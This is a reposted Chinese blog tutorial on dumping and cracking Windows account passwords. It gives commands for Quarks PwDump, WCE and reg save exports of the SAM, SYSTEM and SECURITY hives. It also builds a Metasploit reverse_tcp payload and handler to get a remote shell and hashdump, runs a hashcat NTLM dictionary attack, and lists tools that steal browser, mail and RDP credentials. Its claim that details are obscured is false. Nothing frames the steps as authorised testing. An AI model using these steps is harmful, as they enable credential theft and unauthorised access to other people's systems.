windows 绕过开机密码 Windows密码获取和破解
hello大家好,我是大学网网小航来为大家解答以上问题,windows,绕过开机密码,Windows密码获取和破解很多人还不知道,现在让我们一起来看看吧!
本文只是简单的讲明密码获取和破解
具体的操作细节均以模糊或具体代码混淆等方式避开
如有兴趣请自行研究,本文不做细说~~~
获取思路:
Windows密码一般是以“哈希值”进行加密保存,我们获取破解密码哈希值就可以获得密码了~
密码获取工具:
gethash、gsecdump、Quarks PwDump、Pwdump、mimikatz、WCE……
Quarks PwDump:
是一款Windows下用户密码提取的开源工具,可以抓取Windows平台下多种类型的用户凭证,包括本地账户、域账户、缓存的域账户和Bitlocker的提取。
Quarks PwDump -dh1 // 导出本地哈希值Quarks PwDump -dhdc // 导出内存中域账户哈希值Quarks PwDump -dhd // 导出域哈希值(指定NTDS文件)
WCE:
是一款功能强大的Windows平台的内网渗透工具,可以列举登录会话,并且可以添加、变更、删除相关的凭证数据。是内网渗透的必备工具之一
wce -a //获取所有账户哈希值
reg命令:导出密码文件
通过执行reg命令将SAM、System、SECURITY等文件内容导出到文件中
reg save hklm\sam sam.hivereg save hklm\system system.hivereg save hklm\security security.hive
命令执行后将会将文件保存在本地~
PowerShell获取:
PowerShell加载mimikatz模块获取密码,通过执行该ps脚本即可获取Windows密码
MSF反弹hashdump及mimikatz获取:
通过MSF生成反弹shell或直接溢出获取反弹shell,在MSF下执行hashdump即可~
> msfvenom -p windows/metpreter/reverse_tcp LHOST=192.168.2.196 LPORT=443 -f exe -o met.exe
> use exploit/multi/handler> set PAYLOAD windows/meterpreter/reverse_tcp> set LHOST 192.168.2.0> set LPORT 443> exploit
其它小工具
下列小工具在Windows平台运行就会获得相关的用户凭证……
mailpv:获取mail密码
mspass:获取MSN密码
pst_password:获取Outlook密码
IE PV:获取IE浏览器缓存密码
各类浏览器密码获取工具
passwordfox:获取Firefox浏览器凭证
chromepass:获取谷歌浏览器凭证
无线网络密码获取工具
远程桌面密码获取:
rdpv —— cmdkey/list —— netpass.exe
破解密码哈希值
在线破解:
ophcrack破解:
导入哈希值,加载Tables,执行Crack~
hashcat破解:
最流行的、最快的密码破解工具
破解:
将准备好的字典password.lst和需要破解的哈希值文件win.hast,复制到hashcat32程序文件夹下,执行命令破解:
hashcat -m 1000 -a 0 -o winpassok.txt win.hash password.lst --username
-m 1000 表示破解密码类型为NTLM
-a 0 表示采用字典破解
-o [feilname].txt 表示将破解后的文件输出到指定的文件中
--remove win.hash 表示从win.hash移除破解成功的hash,密码中有username不能与remove参数同时使用,也可以单一破解
password.lst 密码字典文件
物理获取密码
获取SAM和SYSTEM文件
文件通常在C:\Windows\System32\config目录下存放(通常会使用系统盘PE系统进入并拿走文件),找到文件并拷贝:SAM SYSTEM SECURITY 三个文件
导入文件
使用SAMInside软件将三个文件导入到软件中,之后软件就会告知Hash值~
破解哈希密码
导出需要破解的哈希密码值,赋值拷贝到ophcrack软件中进行破解
本文就为大家讲解到这里,希望对大家有所帮助。
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时候联系我们修改或删除,多谢。